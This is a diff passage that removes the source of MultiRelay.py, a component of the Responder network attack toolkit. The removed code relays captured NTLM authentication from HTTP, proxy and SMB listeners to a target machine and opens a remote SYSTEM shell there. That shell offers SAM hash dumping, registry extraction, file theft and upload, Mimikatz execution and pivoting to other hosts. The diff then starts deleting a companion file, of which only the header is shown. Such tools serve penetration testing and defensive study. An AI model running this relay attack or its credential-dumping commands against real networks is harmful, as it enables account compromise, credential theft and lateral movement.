optparse -import time -import random -import subprocess -from threading import Thread -if PY2OR3 == "PY3": - from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler -else: - from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler - -try: - from Crypto.Hash import MD5 -except ImportError: - print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.") - print("You can install it on debian based os with this command: apt-get install python-crypto") - print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n") -try: - import readline -except: - print("Warning: readline module is not available, you will not be able to use the arrow keys for command history") - pass -from MultiRelay.RelayMultiPackets import * -from MultiRelay.RelayMultiCore import * -from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan -sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))) -from socket import * - -__version__ = "2.5" - - -MimikatzFilename = "./MultiRelay/bin/mimikatz.exe" -Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe" -RunAsFileName = "./MultiRelay/bin/Runas.exe" -SysSVCFileName = "./MultiRelay/bin/Syssvc.exe" - -def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) - -if os.path.isfile(SysSVCFileName) is False: - print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1)) - print(color("apt-get install gcc-mingw-w64-x86-64",2,1)) - print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1)) - print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1)) - print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1)) - sys.exit() - -def UserCallBack(op, value, dmy, parser): - args=[] - for arg in parser.rargs: - if arg[0] != "-": - args.append(arg) - if arg[0] == "-": - break - if getattr(parser.values, op.dest): - args.extend(getattr(parser.values, op.dest)) - setattr(parser.values, op.dest, args) - -parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0]) -parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET") -parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort") -parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay") -parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand") -parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump") - -options, args = parser.parse_args() - -if options.TARGET is None: - print("\n-t Mandatory option is missing, please provide a target.\n") - parser.print_help() - exit(-1) -if options.UserToRelay is None: - print("\n-u Mandatory option is missing, please provide a username to relay.\n") - parser.print_help() - exit(-1) -if options.ExtraPort is None: - options.ExtraPort = 0 - -if not os.geteuid() == 0: - print(color("[!] MultiRelay must be run as root.")) - sys.exit(-1) - -OneCommand = options.OneCommand -Dump = options.Dump -ExtraPort = options.ExtraPort -UserToRelay = options.UserToRelay - -Host = [options.TARGET] -Cmd = [] -ShellOpen = [] -Pivoting = [2] - -def ShowWelcome(): - print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)) - print('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com') - print('Usernames to relay (-u) are case sensitive.') - print('To kill this script hit CTRL-C.\n') - print(color('/*',8,1)) - print('Use this script in combination with Responder.py for best results.') - print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n') - print('This tool listen on TCP port 80, 3128 and 445.') - print('For optimal pwnage, launch Responder only with these 2 options:') - print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.') - print('If you do so, use taskkill (as system) to kill the process.') - print(color('*/',8,1)) - print(color('\nRelaying credentials for these users:',8,1)) - print(color(UserToRelay,4,1)) - print('\n') - - -ShowWelcome() - -def ShowHelp(): - print(color('Available commands:',8,0)) - print(color('dump',8,1)+' -> Extract the SAM database and print hashes.') - print(color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)') - print(color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)') - print(color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)') - print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)') - print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\') - print(color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)') - print(color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to') - print(color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)') - print(color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)') - print(color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)') - print(color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)') - print(color('help',8,1)+' -> Print this message.') - print(color('exit',8,1)+' -> Exit this shell and return in relay mode.') - print(' If you want to quit type exit and then use CTRL-C\n') - print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1)) - -Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" -Logs = logging -Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') - -def NetworkSendBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return bytes(str(data), 'latin-1') - -def NetworkRecvBufferPython2or3(data): - if PY2OR3 == "PY2": - return str(data) - else: - return str(data.decode('latin-1')) - -def StructPython2or3(endian,data): - #Python2... - if PY2OR3 == "PY2": - return struct.pack(endian, len(data)) - #Python3... - else: - return struct.pack(endian, len(data)).decode('latin-1') - -def UploadContent(File): - with open(File,'rb') as f: - s = f.read() - FileLen = len(s.decode('latin-1')) - FileContent = s.decode('latin-1') - return FileLen, FileContent - -try: - RunFinger(Host[0]) -except: - raise - print("The host %s seems to be down or port 445 down."%(Host[0])) - sys.exit(1) - - -def get_command(): - global Cmd - Cmd = [] - while any(x in Cmd for x in Cmd) is False: - Cmd = [input("C:\\Windows\\system32\\:#")] - -#Function used to make sure no connections are accepted while we have an open shell. -#Used to avoid any possible broken pipe. -def IsShellOpen(): - #While there's nothing in our array return false. - if any(x in ShellOpen for x in ShellOpen) is False: - return False - #If there is return True. - else: - return True - -#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting. -def IsPivotOn(): - #While there's nothing in our array return false. - if Pivoting[0] == "2": - return False - #If there is return True. - if Pivoting[0] == "1": - print("pivot is on") - return True - -def ConnectToTarget(): - try: - s = socket(AF_INET, SOCK_STREAM) - s.connect((Host[0],445)) - return s - except: - try: - sys.exit(1) - print("Cannot connect to target, host down?") - except: - pass - -class HTTPProxyRelay(BaseRequestHandler): - - def handle(self): - try: - #Don't handle requests while a shell is open. That's the goal after all. - if IsShellOpen(): - return None - if IsPivotOn(): - return None - except: - raise - - s = ConnectToTarget() - try: - data = self.request.recv(8092) - ##First we check if it's a Webdav OPTION request. - Webdav = ServeOPTIONS(data) - if Webdav: - #If it is, send the option answer, we'll send him to auth when we receive a profind. - self.request.send(Webdav) - data = self.request.recv(4096) - - NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) - ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: - #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - - if Packet_NTLM == "\x01": - ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") - n = SMBNegoCairo(Data = SMBNegoCairoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(buffer0) - smbdata = s.recv(2048) - ##Session Setup AndX Request, NTLMSSP_NEGOTIATE - if smbdata[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") - t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - smbdata = s.recv(2048) #got it here. - - ## Send HTTP Proxy - Buffer_Ans = WPAD_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb - key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. - data = self.request.recv(8092) - NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) - Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] - - ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) - ##Might be anonymous, verify it and if so, send no go to client. - if IsSMBAnonymous(NTLM_Auth): - Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) - data = self.request.recv(8092) - else: - #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login - #and has not attempted before. While at it, let's grab his hash. - Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting) - if Username is not None: - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00") - t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - print("[+] SMB Session Auth sent.") - s.send(NetworkSendBufferPython2or3(buffer1)) - smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) - if RunCmd is None: - s.close() - self.request.close() - return None - - else: - ##Any other type of request, send a 407. - Response = WPAD_Auth_407_Ans() - self.request.send(str(Response)) - - except Exception: - self.request.close() - ##No need to print anything (timeouts, rst, etc) to the user console.. - pass - - -class HTTPRelay(BaseRequestHandler): - - def handle(self): - try: - #Don't handle requests while a shell is open. That's the goal after all. - if IsShellOpen(): - return None - if IsPivotOn(): - return None - except: - raise - - try: - s = ConnectToTarget() - - data = self.request.recv(8092) - ##First we check if it's a Webdav OPTION request. - Webdav = ServeOPTIONS(data) - if Webdav: - #If it is, send the option answer, we'll send him to auth when we receive a profind. - self.request.send(NetworkSendBufferPython2or3(Webdav)) - data = self.request.recv(4096) - - NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) - ##Make sure incoming packet is an NTLM auth, if not send HTTP 407. - if NTLM_Auth: - #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) - Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] - - if Packet_NTLM == "\x01": - ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") - n = SMBNegoCairo(Data = SMBNegoCairoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(buffer0) - smbdata = s.recv(2048) - ##Session Setup AndX Request, NTLMSSP_NEGOTIATE - if smbdata[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") - t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - smbdata = s.recv(2048) #got it here. - - ## Send HTTP Response. - Buffer_Ans = IIS_NTLM_Challenge_Ans() - Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb - key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). - self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. - data = self.request.recv(8092) - NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) - Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] - - ##Got NTLM Message 3 from client. - if Packet_NTLM == "\x03": - NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) - ##Might be anonymous, verify it and if so, send no go to client. - if IsSMBAnonymous(NTLM_Auth): - Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) - data = self.request.recv(8092) - else: - #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login - #and has not attempted before. While at it, let's grab his hash. - Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting) - - if Username is not None: - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34],mid="\x03\x00") - t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay. - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - print("[+] SMB Session Auth sent.") - s.send(NetworkSendBufferPython2or3(buffer1)) - smbdata = s.recv(2048) - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) - if RunCmd is None: - s.close() - self.request.close() - return None - - else: - ##Any other type of request, send a 401. - Response = IIS_Auth_401_Ans() - self.request.send(str(Response)) - - - except Exception: - self.request.close() - ##No need to print anything (timeouts, rst, etc) to the user console.. - pass - -class SMBRelay(BaseRequestHandler): - - def handle(self): - try: - #Don't handle requests while a shell is open. That's the goal after all. - if IsShellOpen(): - return None - except: - raise - - try: - s = ConnectToTarget() - - data = self.request.recv(8092) - - ##Negotiate proto answer. That's us. - if data[8:10] == b'\x72\x00': - Header = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x43\xc8", pid=pidcalc(data),mid=midcalc(data)) - Body = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data))) - packet1 = str(Header)+str(Body) - Buffer = StructPython2or3('>i', str(packet1))+str(packet1) - self.request.send(NetworkSendBufferPython2or3(Buffer)) - data = self.request.recv(4096) - - ## Make sure it's not a Kerberos auth. - if data.find(b'NTLM') != -1: - ## Start with nego protocol + session setup negotiate to our target. - data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting) - - ## Make sure it's not a Kerberos auth. - if data.find(b'NTLM') != -1: - ##Relay all that to our client. - if data[8:10] == b'\x73\x00': - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) - #NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange. - #Then simply grab the whole session setup packet except the smb header from the client and pass it to the server. - t = smbdata[36:].decode('latin-1') - packet0 = str(head)+str(t) - buffer0 = longueur(packet0)+packet0 - self.request.send(NetworkSendBufferPython2or3(buffer0)) - data = self.request.recv(4096) - else: - #if it's kerberos, ditch the connection. - s.close() - return None - - if IsSMBAnonymous(NetworkSendBufferPython2or3(data)): - ##Send logon failure for anonymous logins. - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) - t = SMBSessEmpty() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - self.request.send(NetworkSendBufferPython2or3(buffer1)) - s.close() - return None - - else: - #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login - #and has not attempted before. While at it, let's grab his hash. - Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting) - if Username is not None: - ##Got the ntlm message 3, send it over to SMB. - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",uid=smbdata[32:34].decode('latin-1'),mid="\x03\x00") - t = data[36:].decode('latin-1')#Final relay. - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - if Pivoting[0] == "1": - pass - else: - print("[+] SMB Session Auth sent.") - s.send(NetworkSendBufferPython2or3(buffer1)) - smbdata = s.recv(4096) - #We're all set, dropping into shell. - RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) - #If runcmd is None it's because tree connect was denied for this user. - #This will only happen once with that specific user account. - #Let's kill that connection so we can force him to reauth with another account. - if RunCmd is None: - s.close() - return None - - else: - ##Send logon failure, so our client might authenticate with another account. - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x43\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) - t = SMBSessEmpty() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - self.request.send(NetworkSendBufferPython2or3(buffer1)) - data = self.request.recv(4096) - self.request.close() - return None - - except Exception: - self.request.close() - ##No need to print anything (timeouts, rst, etc) to the user console.. - pass - - -#Interface starts here. -def RunShellCmd(data, s, clientIP, Target, Username, Domain): - - #Let's declare our globals here.. - #Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode. - global Pivoting - #Update Host, when pivoting is used. - global Host - #Make sure we don't open 2 shell at the same time.. - global ShellOpen - ShellOpen = ["Shell is open"] - - # On this block we do some verifications before dropping the user into the shell. - if data[8:10] == b'\x73\x6d': - print("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.") - print("[+] Hashes were saved anyways in Responder/logs/ folder.\n") - Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") - del ShellOpen[:] - return False - - if data[8:10] == b'\x73\x8d': - print("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n") - Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") - del ShellOpen[:] - return False - - if data[8:10] == b'\x73\x5e': - print("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n") - del ShellOpen[:] - return False - - ## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$: - ## Tree Connect - if data[8:10] == b'\x73\x00': - GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session. - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x43\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## Nope he doesn't. - if data[8:10] == b'\x75\x22': - if Pivoting[0] == "1": - pass - else: - print("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n") - Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") - del ShellOpen[:] - return False - - # This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. - if data[8:10] == b'\x75\xcc': - print("[+] Tree Connect AndX denied. Bad Network Name returned.") - del ShellOpen[:] - return False - - ## Tree Connect on C$ is successfull. - if data[8:10] == b'\x75\x00': - if Pivoting[0] == "1": - pass - else: - print("[+] Looks good, "+Username+" has admin rights on C$.") - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - - ## Run one command. - if data[8:10] == b'\x75\x00' and OneCommand != None or Dump: - print("[+] Authenticated.") - if OneCommand != None: - print("[+] Running command: %s"%(OneCommand)) - RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0]) - if Dump: - print("[+] Dumping hashes") - DumpHashes(data, s, Target[0]) - os._exit(1) - - ## Drop into the shell. - if data[8:10] == b'\x75\x00' and OneCommand == None: - if Pivoting[0] == "1": - pass - else: - print("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n") - ShowHelp() - Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired") - print(color('Connected to %s as LocalSystem.'%(Target[0]),2,1)) - - while True: - - ## We either just arrived here or we're back from a command operation, let's setup some stuff. - if data[8:10] == b'\x75\x00': - #start a thread for raw_input, so we can do other stuff while we wait for a command. - t = Thread(target=get_command, args=()) - t.daemon = True - t.start() - - #Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation - #to maintain MultiRelay alive and well. - count = 0 - DoEvery = random.randint(10, 45) - while any(x in Cmd for x in Cmd) is False: - count = count+1 - SMBKeepAlive(s, data) - if count == DoEvery: - DumbSMBChain(data, s, Target[0]) - count = 0 - if any(x in Cmd for x in Cmd) is True: - break - - ##Grab the commands. Cmd is global in get_command(). - DumpReg = re.findall('^dump', Cmd[0]) - Read = re.findall('^read (.*)$', Cmd[0]) - RegDump = re.findall('^regdump (.*)$', Cmd[0]) - Get = re.findall('^get (.*)$', Cmd[0]) - Upload = re.findall('^upload (.*)$', Cmd[0]) - Delete = re.findall('^delete (.*)$', Cmd[0]) - RunAs = re.findall('^runas (.*)$', Cmd[0]) - LCmd = re.findall('^lcmd (.*)$', Cmd[0]) - Mimi = re.findall('^mimi (.*)$', Cmd[0]) - Mimi32 = re.findall('^mimi32 (.*)$', Cmd[0]) - Scan = re.findall('^scan (.*)$', Cmd[0]) - Pivot = re.findall('^pivot (.*)$', Cmd[0]) - Help = re.findall('^help', Cmd[0]) - - if Cmd[0] == "exit": - print("[+] Returning in relay mode.") - del Cmd[:] - del ShellOpen[:] - return None - - ##For all of the following commands we send the data (var: data) returned by the - ##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore. - ##We also clean up the command array when done. - if DumpReg: - data = DumpHashes(data, s, Target[0]) - del Cmd[:] - - if Read: - File = Read[0] - data = ReadFile(data, s, File, Target[0]) - del Cmd[:] - - if Get: - File = Get[0] - data = GetAfFile(data, s, File, Target[0]) - del Cmd[:] - - if Upload: - File = Upload[0] - if os.path.isfile(File): - FileSize, FileContent = UploadContent(File) - File = os.path.basename(File) - data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) - del Cmd[:] - else: - print(File+" does not exist, please specify a valid file.") - del Cmd[:] - - if Delete: - Filename = Delete[0] - data = DeleteFile(data, s, Filename, Target[0]) - del Cmd[:] - - if RegDump: - Key = RegDump[0] - data = SaveAKey(data, s, Target[0], Key) - del Cmd[:] - - if RunAs: - if os.path.isfile(RunAsFileName): - FileSize, FileContent = UploadContent(RunAsFileName) - FileName = os.path.basename(RunAsFileName) - data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) - Exec = RunAs[0] - data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName) - del Cmd[:] - else: - print(RunAsFileName+" does not exist, please specify a valid file.") - del Cmd[:] - - if LCmd: - subprocess.call(LCmd[0], shell=True) - del Cmd[:] - - if Mimi: - if os.path.isfile(MimikatzFilename): - FileSize, FileContent = UploadContent(MimikatzFilename) - FileName = os.path.basename(MimikatzFilename) - data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) - Exec = Mimi[0] - data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) - del Cmd[:] - else: - print(MimikatzFilename+" does not exist, please specify a valid file.") - del Cmd[:] - - if Mimi32: - if os.path.isfile(Mimikatzx86Filename): - FileSize, FileContent = UploadContent(Mimikatzx86Filename) - FileName = os.path.basename(Mimikatzx86Filename) - data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) - Exec = Mimi32[0] - data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) - del Cmd[:] - else: - print(Mimikatzx86Filename+" does not exist, please specify a valid file.") - del Cmd[:] - - if Pivot: - if Pivot[0] == Target[0]: - print("[Pivot Verification Failed]: You're already on this host. No need to pivot.") - del Pivot[:] - del Cmd[:] - else: - if ShowSigning(Pivot[0]): - del Pivot[:] - del Cmd[:] - else: - if os.path.isfile(RunAsFileName): - FileSize, FileContent = UploadContent(RunAsFileName) - FileName = os.path.basename(RunAsFileName) - data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) - RunAsPath = '%windir%\\Temp\\'+FileName - Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName) - - if Status == True: - print("[+] Pivoting to %s."%(Pivot[0])) - if os.path.isfile(RunAsFileName): - FileSize, FileContent = UploadContent(RunAsFileName) - data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) - #shell will close. - del ShellOpen[:] - #update the new host. - Host = [Pivot[0]] - #we're in pivoting mode. - Pivoting = ["1"] - data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName) - del Cmd[:] - s.close() - return None - - if Status == False: - print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.") - del Cmd[:] - del Pivot[:] - else: - print(RunAsFileName+" does not exist, please specify a valid file.") - del Cmd[:] - - if Scan: - LocalIp = FindLocalIp() - Range = ConvertToClassC(Target[0], Scan[0]) - RunPivotScan(Range, Target[0]) - del Cmd[:] - - if Help: - ShowHelp() - del Cmd[:] - - ##Let go with the command. - if any(x in Cmd for x in Cmd): - if len(Cmd[0]) > 1: - if os.path.isfile(SysSVCFileName): - FileSize, FileContent = UploadContent(SysSVCFileName) - FileName = os.path.basename(SysSVCFileName) - RunPath = '%windir%\\Temp\\'+FileName - data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) - data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName) - del Cmd[:] - else: - print(SysSVCFileName+" does not exist, please specify a valid file.") - del Cmd[:] - if isinstance(data, str): - data = data.encode('latin-1') - if data is None: - print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n") - - if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. - head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) - t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")# - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(NetworkSendBufferPython2or3(buffer1)) - data = s.recv(2048) - -class ThreadingTCPServer(TCPServer): - def server_bind(self): - TCPServer.server_bind(self) - -ThreadingTCPServer.allow_reuse_address = 1 -ThreadingTCPServer.daemon_threads = True - -def serve_thread_tcp(host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except: - print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)) - -def main(): - try: - threads = [] - threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,))) - threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,))) - if ExtraPort != 0: - threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,))) - for thread in threads: - thread.setDaemon(True) - thread.start() - - while True: - time.sleep(1) - - except (KeyboardInterrupt, SystemExit): - ##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default. - ##This is a bug in python readline when dealing with raw_input().. - if ShellOpen: - os.system('stty sane') - ##Then exit - sys.exit("\rExiting...") - -if __name__ == '__main__': - main() diff --git a/build/lib/Responder/tools/MultiRelay/RelayMultiCore.py b/build/lib/Responder/tools/MultiRelay/RelayMultiCore.py deleted file mode 100644 index 986a0be..0000000 --- a/build/lib/Responder/tools/MultiRelay/RelayMultiCore.py +++ /dev/null @@ -1,2073 +0,0 @@ -#!/usr/bin/env python -# -*- coding: latin-1 -*- -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import sys -if (sys.version_info > (3, 0)): - PY2OR3 = "PY3" -else: - PY2OR3 = "PY2" -import struct -import random -import time -import os -import binascii -import re -import datetime -import threading -import uuid -import codecs -import sys -from .RelayMultiPackets import * -from Responder.odict import OrderedDict -from base64 import b64decode, b64encode - 